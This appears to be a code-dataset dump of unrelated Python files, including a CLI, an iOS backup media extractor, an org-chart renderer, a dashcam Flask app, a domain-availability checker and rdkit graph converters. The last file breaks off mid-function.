content stringlengths 5 1.05M |
|---|
# coding:utf-8
from __future__ import absolute_import, unicode_literals
import click, json
from jspider.cli.common import common_pass, common_options
__author__ = "golden"
__date__ = '2018/6/9'
@click.group(name='list')
def list_obj():
    """show something"""
@list_obj.command()
@common_options
@common_pass
def projects(pub):
    """show all projects"""
    # Pretty-print the project list as UTF-8 JSON.
    result = pub.manager.list_projects()
    print(json.dumps(result, sort_keys=True, indent=2, ensure_ascii=False))
@list_obj.command()
@common_options
@common_pass
def spiders(pub):
    """show all spiders"""
    # Pretty-print the spider list as UTF-8 JSON.
    result = pub.manager.list_spiders()
    print(json.dumps(result, sort_keys=True, indent=2, ensure_ascii=False))
|
import os
import shutil
import sqlite3
import argparse
# http://stackoverflow.com/questions/12517451/python-automatically-creating-directories-with-file-output
# http://stackoverflow.com/questions/12517451/python-automatically-creating-directories-with-file-output
def copy_file_create_subdirs(src_file, dst_file):
    """Copy src_file to dst_file, creating any missing parent directories.

    BUG FIX: the original referenced `errno.EEXIST` without ever importing
    `errno`, so losing the makedirs race raised NameError instead of being
    ignored. Also guard against dst_file having no directory component.
    """
    import errno  # local import: the file-level import block is outside this function
    dst_dir = os.path.dirname(dst_file)
    if dst_dir and not os.path.exists(dst_dir):
        try:
            os.makedirs(dst_dir)
        except OSError as exc:  # Guard against race condition
            if exc.errno != errno.EEXIST:
                raise
    # copy2 should keep metadata intact
    shutil.copy2(src_file, dst_file)
def extract_media_from_backup(backup_dir, out_dir):
    """Copy the camera-roll media files recorded in an iOS backup's
    Manifest.db into out_dir, preserving the original relative paths.

    FIXES: the sqlite connection was never closed (resource leak), and the
    Python 2 print statements are now Python 3 function calls.
    """
    conn = sqlite3.connect(os.path.join(backup_dir, 'Manifest.db'))
    try:
        # simple query to get only media (without thumbnails)
        query = "SELECT * FROM Files WHERE domain = 'CameraRollDomain' AND relativePath LIKE '%Media/DCIM%'"
        for subfile, _, relpath, _, _ in conn.cursor().execute(query):
            # files are stored in subdirectories, that match first 2 characters of their names
            subdir = subfile[:2]
            # abspath will normalize path separators (windows uses reverse slashes, but relpath has forward ones)
            # doing it on src_file is not really necessary, but won't hurt
            src_file = os.path.abspath(os.path.join(backup_dir, subdir, subfile))
            dst_file = os.path.abspath(os.path.join(out_dir, relpath))
            try:
                copy_file_create_subdirs(src_file, dst_file)
                print(src_file)
                print(dst_file, '\n')
            except Exception as e:
                # best-effort: report the failed file and keep going
                print(e, '\n')
    finally:
        conn.close()
if __name__ == "__main__":
    # CLI entry point: two positional directories, then run the extraction.
    parser = argparse.ArgumentParser(
        description="Copies media files (that were stored in 'Media/DCIM/' directory) to a "
                    "specified location, retaining directory structure")
    parser.add_argument('backup_dir', help='Location of backup directory')
    parser.add_argument(
        'out_dir',
        help='Destination directory, relative to which '
             'files would be copied, according to original directory structure')
    arguments = parser.parse_args()
    extract_media_from_backup(arguments.backup_dir, arguments.out_dir)
|
import sys
import click
import random
import webcolors
from ete3 import Tree, TreeStyle, NodeStyle, TextFace
from typing import List, Dict, AnyStr, Callable
# -------------------------------------------------------------------------------
# Colour caches: one value per distinct key, filled lazily by the
# colour_by_* helpers / ete_graph so repeated keys reuse the same colours.
locationColours = {}
teamColours = {}
# All CSS3 colour names known to webcolors (unpack the mapping's keys).
allColours = [*webcolors.CSS3_NAMES_TO_HEX]
# -------------------------------------------------------------------------------
def pick_colours():
    """Pick a random CSS3 background colour and a readable foreground.

    Foreground is white on dark backgrounds, black on light ones, using
    the Rec.709 luminance weights with a threshold of 140.
    """
    background = random.choice(allColours)
    r, g, b = webcolors.name_to_rgb(background, spec=webcolors.CSS3)
    luminance = 0.2126 * r + 0.7152 * g + 0.0722 * b
    foreground = "white" if luminance < 140 else "black"
    return [background, foreground]
# -------------------------------------------------------------------------------
class Employee:
    """One row of the org-chart CSV mapped onto named attributes."""

    # Maps a CSV header name to a setter that stores that column's value.
    setters = {
        "Employee ID": lambda x, y: setattr(x, "employee_id", y),
        "Name": lambda x, y: setattr(x, "name", y),
        "Location": lambda x, y: setattr(x, "location", y),
        "Grade": lambda x, y: setattr(x, "grade", y),
        "Supervisor ID": lambda x, y: setattr(x, "supervisor", y),
        "Role": lambda x, y: setattr(x, "role", y),
        "Image": lambda x, y: setattr(x, "image", y),
        "Top-level team": lambda x, y: setattr(x, "team", y),
        "Gender": lambda x, y: setattr(x, "gender", y),
        "Start Date": lambda x, y: setattr(x, "start_date", y),
        "Job Title": lambda x, y: setattr(x, "job_title", y)
    }

    @staticmethod
    def initial_attributes():
        """Return a header -> column-index map with every index unset (-1)."""
        return {k: -1 for k in Employee.setters.keys()}

    def __init__(self, map_: Dict, tokens_: List, colour_: Callable):
        """Populate attributes from `tokens_` using the header->index `map_`,
        then compute this employee's display colours via `colour_`."""
        self.employee_id = ""
        self.name = ""
        self.grade = ""
        self.supervisor = ""
        self.image = ""
        self.role = ""
        self.location = ""
        self.team = ""
        self.gender = ""
        self.job_title = ""
        self.reports = []  # employee_ids of direct reports, filled in later
        # Apply only the columns that were actually present in the header row.
        for k, v in filter(lambda x: x[1] != -1, map_.items()):
            Employee.setters[k](self, tokens_[v])
        self.colours = colour_(self)

    def __str__(self):
        # BUG FIX: the original used '"..." + "...".format(...)', and since
        # '+' binds before the method call, .format() applied only to the
        # second fragment — the first half's placeholders were never filled.
        # Format the whole template at once (also fixes the "immge" typo).
        return ("id: {}\n name: {}\n grade: {}\n supervisor: {}\n image: {}\n role: {}\n location: {}\n team: {}"
                "\n gender: {}\n job title: {}\n [{}]").format(
            self.employee_id,
            self.name,
            self.grade,
            self.supervisor,
            self.image,
            self.role,
            self.location,
            self.team,
            self.gender,
            self.job_title,
            ", ".join(self.reports))
# -------------------------------------------------------------------------------
def _cached_colours(key):
    # One colour pair per distinct key. Note pick_colours() is evaluated even
    # on cache hits (setdefault evaluates its default eagerly) — this matches
    # the original behaviour exactly.
    return teamColours.setdefault(key, pick_colours())

def colour_by_team(employee_: Employee):
    return _cached_colours(employee_.team)

def colour_by_role(employee_: Employee):
    return _cached_colours(employee_.role)

def colour_by_gender(employee_: Employee):
    return _cached_colours(employee_.gender)

def colour_by_location(employee_: Employee):
    return _cached_colours(employee_.location)

def colour_by_grade(employee_: Employee):
    return _cached_colours(employee_.grade)

def colour_by_jon_title(employee_: Employee):
    # NOTE(review): "jon" looks like a typo for "job", but handle_colour_by
    # references this exact name, so it is kept for compatibility.
    return _cached_colours(employee_.job_title)

def colour_by_none(_):
    # Fixed palette when no colouring dimension was requested.
    return ["White", "Black"]
# -------------------------------------------------------------------------------
def ete_graph(employee_: AnyStr, employees_: Dict, manager_=None):
    """Recursively build the ete3 tree for `employee_` and all reports.

    :param employee_: employee_id of the subtree root
    :param employees_: employee_id -> Employee mapping
    :param manager_: parent ete3 node, or None for the chart root
    :return: the root Tree node when manager_ is None, otherwise None
    """
    employee = employees_[employee_]
    # Root employee creates a fresh Tree; everyone else hangs off their manager.
    employee_node = manager_.add_child(name=employee.name, dist=1) if manager_ else Tree(name=employee.name)
    node_style = NodeStyle()
    node_style["shape"] = "sphere"
    # Employees with a role get a bigger marker.
    node_style["size"] = 40 if employee.role else 20
    # Node colour keyed by location; cached so a location keeps its colour.
    node_style["fgcolor"] = locationColours.setdefault(employees_[employee_].location, random.choice(allColours))
    employee_node.set_style(node_style)
    def text_face(name_, colour_, fsize_=30):
        # Small label factory: colour_ is a [background, foreground] pair.
        face = TextFace(name_, tight_text=False, fsize=fsize_)
        face.margin_right = 5
        face.margin_left = 5
        face.background.color = colour_[0]
        face.fgcolor = colour_[1]
        return face
    position = "branch-right"
    employee_node.add_face(text_face(employee.name, employee.colours), column=0, position=position)
    if employee.role:
        # Role shown in a smaller face under the name.
        employee_node.add_face(text_face(employee.role, employee.colours, 20), column=0, position=position)
    for report in employees_[employee_].reports:
        ete_graph(report, employees_, employee_node)
    if not manager_:
        return employee_node
# -------------------------------------------------------------------------------
def tree_style():
    """Build the circular TreeStyle used when rendering the chart."""
    style = TreeStyle()
    style.show_leaf_name = False  # names are drawn via explicit TextFaces
    style.mode = "c"  # circular layout
    style.show_scale = False
    style.scale = None
    style.optimal_scale_level = "full"
    style.force_topology = True
    return style
# -------------------------------------------------------------------------------
def handle_colour_by(_, __, value: AnyStr):
    """Click callback: map the --colour-by choice to its colouring function.

    Returns None for unmatched values, just as the original if/elif chain did
    (click.Choice already restricts the input to the known set).
    """
    dispatch = {
        "role": colour_by_role,
        "location": colour_by_location,
        "grade": colour_by_grade,
        "gender": colour_by_gender,
        "team": colour_by_team,
        "title": colour_by_jon_title,
        "none": colour_by_none,
    }
    return dispatch.get(value)
# -------------------------------------------------------------------------------
@click.command()
@click.argument("data", type=click.File("r"))
@click.option("-r", "--root", default=None, help="Person to use as the top of the chart")
@click.option("-f", "--file", default="org-chart.png", help="output file")
@click.option("-c", "--colour-by", type=click.Choice(["role", "location", "grade", "gender", "team", "none", "title"]),
              default="none", callback=handle_colour_by)
def cli(data, root, file, colour_by):
    # Read the org CSV from `data`, build the reporting tree and render it.
    # (Comment, not a docstring, so click's --help output is unchanged.)
    employees = []
    def normalise(str_):
        # Strip the trailing newline carried by each raw CSV line.
        return str_.rstrip("\n")
    attributes = Employee.initial_attributes()
    # First line is the header row: record the column index of each field.
    headers = list(map(normalise, data.readline().split(',')))
    for i, token in enumerate(headers):
        # NOTE(review): header names absent from Employee.setters are also
        # recorded here and would raise KeyError inside Employee.__init__ —
        # presumably the CSV only ever contains known columns; confirm.
        attributes[token] = i
    for line in data.readlines()[:]:
        tokens = list(map(normalise, line.split(',')))
        employees.append(Employee(attributes, tokens, colour_by))
    employees_by_id = {k.employee_id: k for k in employees}
    name_to_id = {k.name: k.employee_id for k in employees}
    # TODO Don't take two passes to do this
    for employee in employees:
        try:
            # Register each employee as a report of their supervisor.
            employees_by_id[employee.supervisor].reports.append(employee.employee_id)
        except KeyError:
            pass
        # An employee without a supervisor becomes the default chart root.
        if employee.supervisor == "" and not root:
            root = employee.name
    try:
        employee_id = name_to_id[root]
    except KeyError:
        sys.stderr.write(root + " Does not exist in csv file\n")
        sys.exit(1)
    tree = ete_graph(employee_id, employees_by_id)
    tree.render(file, tree_style=tree_style())
# -------------------------------------------------------------------------------
if __name__ == "__main__":
    cli()
|
from math import ceil
from operator import attrgetter
import time
from flask import Flask, Response, abort, render_template, redirect, request, \
url_for
from flask_bootstrap import Bootstrap
from . import Mode, YIDashcam, YIDashcamException, \
YIDashcamConnectionException, YIDashcamFileException
from .config import option_map
# Flask app named after the top-level package (strip any sub-module path).
app = Flask(__name__.split(".")[0])
Bootstrap(app)
# Serve Bootstrap assets locally — presumably because the dashcam's own
# access point has no internet connectivity; confirm.
app.config['BOOTSTRAP_SERVE_LOCAL'] = True
# Lazily-initialised shared YIDashcam handle; see get_yi().
yi = None
class Pagination():
    """Derived from http://flask.pocoo.org/snippets/44/

    Fixed-size pagination over a sequence of `total_count` items,
    `per_page` items per page; pages are numbered from 1.
    """
    def __init__(self, page, per_page, total_count):
        self.page = page
        self.per_page = per_page
        self.total_count = total_count
        if not 1 <= page <= self.pages:
            raise ValueError("Invalid page number")

    @property
    def pages(self):
        """Total number of pages; an empty collection still has one page."""
        full = ceil(self.total_count / self.per_page)
        return full if full else 1

    @property
    def has_prev(self):
        return self.page > 1

    @property
    def has_next(self):
        return self.page < self.pages

    @property
    def first_item_index(self):
        """Zero-based index of the first item on the current page."""
        return (self.page - 1) * self.per_page

    @property
    def last_item_index(self):
        """Index one past the last item on the current page."""
        return self.total_count if self.page == self.pages else self.page * self.per_page

    def page_items(self, items):
        """Return list of items on current page from `items`"""
        return items[self.first_item_index:self.last_item_index]
def url_for_other_page(page):
    """http://flask.pocoo.org/snippets/44/

    Build the URL of the current endpoint with only the page number changed.
    """
    view_args = dict(request.view_args, page=page)
    return url_for(request.endpoint, **view_args)
# Expose the helper to Jinja templates for pagination links.
app.jinja_env.globals['url_for_other_page'] = url_for_other_page
def get_yi():
    """Return the shared YIDashcam handle, connected and in file mode."""
    global yi
    if yi is None:
        # First use: create and connect in file mode.
        yi = YIDashcam(Mode.file)
        return yi
    if not yi.connected:
        # Dropped connection: reconnect in file mode.
        yi.connect(mode=Mode.file)
        return yi
    if yi.mode != Mode.file:
        # Connected but in the wrong mode: switch back to file mode.
        yi.set_mode(Mode.file)
    return yi
@app.errorhandler(404)
def error_404_handler(error):
    # Generic error page for missing routes.
    return render_template("error.html", message=error), 404

@app.errorhandler(500)
def error_500_handler(error):
    # Generic error page for internal errors.
    return render_template("error.html", message=error), 500

@app.errorhandler(YIDashcamException)
def yi_handler(error):
    # Any other dashcam API failure surfaces as a server-side error.
    message = "Error Interfacing With YI Dashcam"
    return render_template("error.html", message=message), 500

@app.errorhandler(YIDashcamConnectionException)
def yi_connection_handler(error):
    # Connection failures get their own, more specific message.
    message = "Failed To Connect To YI Dashcam"
    return render_template("error.html", message=message), 500

@app.errorhandler(YIDashcamFileException)
def yi_file_handler(error):
    # A file missing on the camera maps to a plain 404.
    message = "File Not Found On YI Dashcam"
    return render_template("error.html", message=message), 404
@app.context_processor
def yi_context():
    """Expose camera identity to all templates once a connection exists."""
    if yi is None or not yi.connected:
        return {}
    return {
        'serial_number': yi.serial_number,
        'firmware_version': yi.firmware_version,
    }
@app.route('/')
def index():
    """Land on the emergency-clip listing by default."""
    return redirect(url_for('file_list_page', file_type="emergency"))
@app.route('/<file_type>/', defaults={'page': 1})
@app.route('/<file_type>/<int:page>')
def file_list_page(file_type, page):
    """Paginated listing of one of the camera's file collections."""
    attribute = '{}_list'.format(file_type)
    try:
        file_list = getattr(get_yi(), attribute)
    except AttributeError:
        abort(404)  # unknown file type in the URL
    # NOTE(review): a None file_list is given length 1 here but would still
    # crash at .sort() below — presumably the attribute is never None; confirm.
    total = len(file_list) if file_list is not None else 1
    try:
        pagination = Pagination(page, 20, total)
    except ValueError:
        # Bad page number
        abort(404)
    file_list.sort(key=attrgetter('time'), reverse=True)
    current_page = pagination.page_items(file_list)
    return render_template(
        'file_list.html',
        file_type=file_type,
        file_list=current_page,
        file_dates={item.time.date() for item in current_page},
        pagination=pagination)
@app.route('/thumbnail/<path:path>')
def thumbnail(path):
    """Fetch thumbnail, and ask browser to cache for a week"""
    body = get_yi().get_thumbnail(path)
    cache_headers = {'Cache-Control': "max-age=604800"}
    return Response(body, headers=cache_headers, mimetype='image/jpeg')
@app.route('/delete/<path:path>', methods=["POST"])
def delete(path):
    """Delete file from dashcam"""
    # The camera expects DOS-style paths on its "A:" drive.
    dashcam_path = "A:\\{}".format(path.replace('/', '\\'))
    get_yi().delete_file(dashcam_path, force=True)
    target = request.form.get("next", request.referrer)
    return redirect(target, code=303)
@app.route('/settings', methods=["GET", "POST"])
def settings():
    """Page to interact with dashcam config"""
    if request.method == "POST":
        yi = get_yi()
        # Apply every submitted option whose value actually changed.
        for option, cur_value in yi.config.items():
            new_value = request.form.get(option.name, None)
            if new_value is not None and int(new_value) != cur_value:
                yi.set_config(option, int(new_value))
        # NOTE(review): set_config may bump the camera out of file mode, so
        # file mode is restored after applying changes — confirm placement.
        yi.set_mode(Mode.file)
        time.sleep(0.5)  # Allow settings to settle in
        # Redirect-after-POST so a refresh does not resubmit the form.
        return redirect(url_for('settings'), code=303)
    else:
        return render_template(
            'settings.html', settings=get_yi().config, option_map=option_map)
|
from bitmovin.errors import InvalidTypeError
from bitmovin.resources.enums.hls_version import HlsVersion

from ..abstract_manifest import AbstractManifest
class HlsManifest(AbstractManifest):
    """HLS manifest resource carrying optional media/master playlist versions.

    BUG FIX: the setters raised `InvalidTypeError`, which was never imported,
    so an invalid type crashed with NameError instead — the import is now
    added at file level. The two identical setters also share one helper.
    """

    def __init__(self, manifest_name, outputs, name=None, description=None, id_=None, custom_data=None,
                 hls_media_playlist_version=None, hls_master_playlist_version=None):
        super().__init__(id_=id_, custom_data=custom_data, manifest_name=manifest_name, outputs=outputs,
                         name=name, description=description)
        self._hlsMediaPlaylistVersion = None
        self.hlsMediaPlaylistVersion = hls_media_playlist_version
        self._hlsMasterPlaylistVersion = None
        self.hlsMasterPlaylistVersion = hls_master_playlist_version

    @staticmethod
    def _coerce_version(new_version, attribute_name):
        """Normalize a playlist version.

        HlsVersion enum members collapse to their int value; plain ints and
        None pass through; anything else raises InvalidTypeError.
        """
        if new_version is None:
            return None
        if isinstance(new_version, HlsVersion):
            return new_version.value
        if isinstance(new_version, int):
            return new_version
        raise InvalidTypeError('{} has to be of type HlsVersion'.format(attribute_name))

    @property
    def hlsMediaPlaylistVersion(self):
        return self._hlsMediaPlaylistVersion

    @hlsMediaPlaylistVersion.setter
    def hlsMediaPlaylistVersion(self, new_hls_media_playlist_version):
        self._hlsMediaPlaylistVersion = self._coerce_version(
            new_hls_media_playlist_version, 'hlsMediaPlaylistVersion')

    @property
    def hlsMasterPlaylistVersion(self):
        return self._hlsMasterPlaylistVersion

    @hlsMasterPlaylistVersion.setter
    def hlsMasterPlaylistVersion(self, new_hls_master_playlist_version):
        self._hlsMasterPlaylistVersion = self._coerce_version(
            new_hls_master_playlist_version, 'hlsMasterPlaylistVersion')

    @classmethod
    def parse_from_json_object(cls, json_object):
        """Build an HlsManifest from an API JSON payload."""
        manifest = AbstractManifest.parse_from_json_object(json_object=json_object)
        hls_manifest = HlsManifest(
            id_=manifest.id,
            manifest_name=manifest.manifestName,
            custom_data=manifest.customData,
            outputs=manifest.outputs,
            name=manifest.name,
            description=manifest.description,
            hls_media_playlist_version=json_object.get('hlsMediaPlaylistVersion'),
            hls_master_playlist_version=json_object.get('hlsMasterPlaylistVersion'))
        return hls_manifest

    def serialize(self):
        """Extend the base serialization with the two HLS version fields."""
        serialized = super().serialize()
        serialized['hlsMediaPlaylistVersion'] = self.hlsMediaPlaylistVersion
        serialized['hlsMasterPlaylistVersion'] = self.hlsMasterPlaylistVersion
        return serialized
|
import asyncio
import click
from pyrobot.rgb_leds import RgbUnderlighting, HsvColor
@click.group()
@click.pass_context
def cli(ctx):
    # Root command group; guarantee a dict-typed context object exists.
    ctx.ensure_object(dict)
@cli.command()
@click.pass_context
@click.option('-h', 'h', default=255, show_default=True)
@click.option('-s', 's', default=255, show_default=True)
@click.option('-v', 'v', default=255, show_default=True)
def all(ctx, h, s, v):
    # Set every underlighting LED to the given HSV colour.
    lights = ctx.obj['lights']
    lights.set_color(HsvColor(h, s, v))
@cli.command()
@click.pass_context
@click.option('-h', 'hue', default=0, show_default=True)
@click.option('-s', 'saturation', default=0, show_default=True)
def flash(ctx, hue, saturation):
    # Run the flash coroutine to completion on a fresh event loop.
    lights = ctx.obj['lights']
    asyncio.run(lights.flash(hue, saturation))
@cli.command()
@click.pass_context
@click.option('-h', 'h', default=255, show_default=True)
@click.option('-s', 's', default=255, show_default=True)
@click.option('-v', 'v', default=255, show_default=True)
@click.argument('pattern')
def set(ctx, h, s, v, pattern):
    # NOTE: shadows the builtin `set`, but the function name defines the CLI
    # command name, so it is kept.
    lights = ctx.obj['lights']
    print(pattern)
    lights.change_color(HsvColor(h, s, v), pattern)
@cli.command()
@click.pass_context
def off(ctx):
    # Switch all underlighting LEDs off.
    lights = ctx.obj['lights']
    lights.turn_off()

if __name__ == '__main__':
    # Share one RgbUnderlighting instance with every sub-command via ctx.obj.
    cli(obj={'lights': RgbUnderlighting()})
|
from abc import abstractmethod
class Metric:
    """Base class for training metrics.

    Provides no-op lifecycle hooks invoked around epochs, tasks and batches,
    plus a callable interface for computing the metric value. Subclasses
    override only the hooks they need.

    FIXES: `__call__` took `*arg` (typo for `*args`); commented-out dead
    hook stubs removed.
    """

    def on_epoch_starts(self, *args, **kwargs):
        """Called before an epoch begins; default is a no-op."""
        pass

    def on_epoch_ends(self, *args, **kwargs):
        """Called after an epoch completes; default is a no-op."""
        pass

    def on_task_starts(self, *args, **kwargs):
        """Called before a task begins; default is a no-op."""
        pass

    def on_task_ends(self, *args, **kwargs):
        """Called after a task completes; default is a no-op."""
        pass

    def on_batch_starts(self, *args, **kwargs):
        """Called before a batch is processed; default is a no-op."""
        pass

    def on_batch_ends(self, *args, **kwargs):
        """Called after a batch is processed; default is a no-op."""
        pass

    def __call__(self, *args, **kwargs) -> int:
        """Compute the metric value; base implementation returns None."""
        pass
class ContinualLearningMetric(Metric):
    """Metric over a continual-learning run; subclasses implement __call__."""

    def __init__(self):
        super(ContinualLearningMetric, self).__init__()

    @abstractmethod
    def __call__(self, *args, **kwargs) -> int:
        # Abstract in intent; Metric is not an ABC, so raise explicitly too.
        raise NotImplementedError
class ClassificationMetric(Metric):
    """Metric comparing predictions to targets; subclasses implement __call__."""

    def __init__(self):
        super(ClassificationMetric, self).__init__()

    @abstractmethod
    def __call__(self, y_true, y_pred, *args, **kwargs) -> int:
        # Abstract in intent; Metric is not an ABC, so raise explicitly too.
        raise NotImplementedError
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2018 Abdelkrime Aries <kariminfo0@gmail.com>
#
# ---- AUTHORS ----
# 2018 Abdelkrime Aries <kariminfo0@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import numpy
import tensorflow as tf
from modeling.seq_autoencoder import SeqAutoEncoder
from reading import reader
# Root directory holding one sub-directory of pre-computed stats per language.
dataset_url = "/home/kariminf/Data/ATS/Mss15Train/stats/"
# language name -> document-similarity sequences for that language.
batch = {}
for f in os.listdir(dataset_url):
    lang_url = os.path.join(dataset_url, f)
    if os.path.isdir(lang_url):
        # NOTE: Python 2 print statement — this script targets TF 1.x / Python 2.
        print "reading ", f
        doc_sim_seq = reader.get_doc_sim_lang(lang_url)
        batch[f] = doc_sim_seq
#Inputs holders
# Variable-length sequence of scalar similarities: (batch, time, 1).
doc_sim_seq_ = tf.placeholder(tf.float32, shape=[None,None,1], name="doc_sim_seq_in")
model = SeqAutoEncoder("doc_sim", doc_sim_seq_)
latent = model.get_latent()
output = model.get_graph()
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
# NOTE(review): the training step below is still commented out, so this loop
# only prints input shapes for 100 passes over the languages — confirm intent.
for i in range(100):
    for lang in batch:
        doc_sim_seq = batch[lang]
        print i, lang, numpy.shape(doc_sim_seq)
        #_, cst, o = sess.run([train_step, cost, out], feed_dict={x: X, r: R})
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import logging
import traceback
import tornado.ioloop
from tornado import gen
from tornado.httpclient import AsyncHTTPClient
from data.models import LastDomain, Domain
from data.session_mysql import SessionCM
__author__ = 'f0x11'
# Browser-like User-Agent so the godaddy API does not reject the probes.
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) '
                  'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36',
}
# Alphabet that generated domains are drawn from; alternates kept for reference.
# chars = '0123456789'
chars = 'abcdefghijklmnopqrstuvwxyz'
# chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
# Running count of domains yielded by gen_domain_list.
total = 0


def init_domain_info(domain):
    """Translate *domain* into a list of per-character indexes into `chars`.

    Raises Exception('domain error') (after logging) when a character is
    outside the alphabet.
    """
    domain_info = []
    for c in domain:
        # BUG FIX: str.index() raises ValueError for a missing character and
        # never returns -1, so the error branch below was unreachable;
        # str.find() returns -1 and makes it work as intended.
        idx = chars.find(c)
        if idx < 0:
            logging.warning("domain error, domain=%s" % domain)
            raise Exception('domain error')
        domain_info.append(idx)
    return domain_info
def gen_domain_list(start_domain="00000"):
    """Yield candidate domain strings, varying from the front first
    (odometer with the least-significant position at index 0).

    :param start_domain: domain to resume the enumeration from
    """
    domain_len = len(start_domain)
    total_len = len(chars)
    # domain_info = [0] * domain_len
    domain_info = init_domain_info(start_domain)
    def gen_domain(i):
        # Increment position i; on overflow reset it and carry rightward.
        if i >= domain_len:
            return False  # carried past the last position: enumeration done
        domain_info[i] += 1
        if domain_info[i] >= total_len:
            domain_info[i] = 0
            return gen_domain(i + 1)
        return True
    while True:
        global total
        total += 1  # module-level counter of domains yielded so far
        yield ''.join([chars[d] for d in domain_info])
        con = gen_domain(0)
        if not con:
            break
@gen.coroutine
def capture_domain(domain):
    """Query godaddy for `<domain>.com` and record it when available."""
    try:
        http_client = AsyncHTTPClient()
        response = yield http_client.fetch(
            'https://www.godaddy.com/domainsapi/v1/search/exact?q={0}.com'.format(domain),
            headers=headers)
    except:
        # NOTE(review): bare except — logs and skips every failure, including
        # cancellation; consider narrowing.
        logging.error(traceback.format_exc())
        return
    if response.error:
        logging.error("Error: %s", response.error)
        return
    if not response.body:
        logging.error("Error: body is null, domain=%s", domain)
        return
    content = json.loads(response.body.decode())
    is_available = content['ExactMatchDomain']['IsAvailable']
    with SessionCM() as db_session:
        if is_available:
            # Available: store the domain itself.
            new_domain = Domain(content=domain)
            db_session.add(new_domain)
            db_session.commit()
        # Advance the resume checkpoint to the last domain probed —
        # presumably for every probe, not just available ones; confirm.
        db_session.query(LastDomain).update({'content': domain})
        db_session.commit()
@gen.coroutine
def capture_domains():
    """Resume enumeration from the stored checkpoint and probe each domain."""
    with SessionCM() as db_session:
        last_domain_item = db_session.query(LastDomain).first()
        if last_domain_item:
            start_domain = last_domain_item.content
        else:
            start_domain = chars[0] * 5  # no checkpoint yet: start at 'aaaaa'
    for domain in gen_domain_list(start_domain):
        yield capture_domain(domain)
        yield gen.sleep(1)  # throttle: roughly one request per second
    # Enumeration exhausted: stop the IOLoop started in __main__.
    tornado.ioloop.IOLoop.instance().stop()
if __name__ == '__main__':
    # for i in gen_domain_list('11'):
    # print(i)
    # The coroutine schedules itself; the IOLoop below then drives it and is
    # stopped from inside capture_domains() when enumeration finishes.
    capture_domains()
    tornado.ioloop.IOLoop.instance().start()
|
# flake8: noqa
from chat.server.core import Server, WebServer
from chat.server.requests import Request, ServerRequest
# Module-level singleton consumed by the route handlers.
server: Server = WebServer()
# Imported last on purpose: `routes` needs the `server` object defined above,
# so the import order here is load-bearing (avoids a circular-import failure).
from . import routes
|
'''
interface between networkx graphs and the world of chemistry via rdkit
functionality:
# generating networkx graphs:
sdf_to_nx(file.sdf)
smi_to_nx(file.smi)
smiles_to_nx(smilesstringlist)
# graph out:
draw(nx)
nx_to_smi(graphlist, path_to_file.smi)
#bonus: garden style transformer.
class MoleculeToGraph
'''
from sklearn.base import BaseEstimator, TransformerMixin
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem import Draw
import networkx as nx
import logging
logger = logging.getLogger(__name__)
class MoleculeToGraph(BaseEstimator, TransformerMixin):
    def __init__(self, file_format='sdf'):
        """Constructor.

        valid 'file_format' strings and what the transformer will expect
        smi: path to .smi file
        sdf: path to .sdf file
        """
        self.file_format = file_format

    def transform(self, data):
        """Yield a networkx graph per molecule read from `data`."""
        try:
            if self.file_format == 'smi':
                graph_stream = smi_to_nx(data)
            elif self.file_format == 'sdf':
                graph_stream = sdf_to_nx(data)
            else:
                raise Exception('file_format must be smi or sdf')
            yield from graph_stream
        except Exception as e:
            # Best-effort: a failed iteration ends the stream quietly.
            logger.debug('Failed iteration. Reason: %s' % e)
            logger.debug('Exception', exc_info=True)
################
# import to networkx graphs
###############
def sdf_to_nx(file):
    """Stream the molecules of an .sdf file as networkx graphs."""
    for mol in Chem.SDMolSupplier(file):
        yield rdkmol_to_nx(mol)

def smi_to_nx(file):
    """Stream the molecules of a .smi file as networkx graphs."""
    for mol in Chem.SmilesMolSupplier(file):
        yield rdkmol_to_nx(mol)
def rdkmol_to_nx(mol):
    """Convert an rdkit Mol into an nx.Graph with 'label' attributes:
    element symbols on nodes, integer bond orders (as strings) on edges."""
    graph = nx.Graph()
    for atom in mol.GetAtoms():
        graph.add_node(atom.GetIdx(), label=atom.GetSymbol())
    for bond in mol.GetBonds():
        order = str(int(bond.GetBondTypeAsDouble()))
        graph.add_edge(bond.GetBeginAtomIdx(), bond.GetEndAtomIdx(), label=order)
    return graph
def smiles_strings_to_nx(smileslist):
    """Parse each SMILES string into a networkx graph."""
    for smiles in smileslist:
        yield rdkmol_to_nx(Chem.MolFromSmiles(smiles))
################
# exporting networkx graphs
###############
def nx_to_smi(graphs, file):
    """Write the SMILES string of every graph to `file`, newline-separated."""
    smiles = [Chem.MolToSmiles(nx_to_rdkit(graph)) for graph in graphs]
    with open(file, 'w') as handle:
        handle.write('\n'.join(smiles))
def nx_to_rdkit(graph):
    """Rebuild an rdkit Mol from a graph produced by rdkmol_to_nx."""
    editable = Chem.RWMol(Chem.MolFromSmiles(''))
    atom_index = {}
    for node, attrs in graph.nodes(data=True):
        atom_index[node] = editable.AddAtom(Chem.Atom(attrs['label']))
    # more options:
    # http://www.rdkit.org/Python_Docs/rdkit.Chem.rdchem.BondType-class.html
    for a, b, attrs in graph.edges(data=True):
        order = attrs.get("label", '1')
        if order == '1':
            kind = Chem.BondType.SINGLE
        elif order == '2':
            kind = Chem.BondType.DOUBLE
        elif order == '3':
            kind = Chem.BondType.TRIPLE
        else:
            raise Exception('bond type not implemented')
        editable.AddBond(atom_index[a], atom_index[b], kind)
    return editable.GetMol()
###########################
# output
###########################
def set_coordinates(chemlist):
    """Compute 2D coordinates for each molecule prior to drawing."""
    for mol in chemlist:
        if not mol:
            raise Exception('set coordinates failed..')
        # updateprops fixes "RuntimeError: Pre-condition Violation"
        mol.UpdatePropertyCache(strict=False)
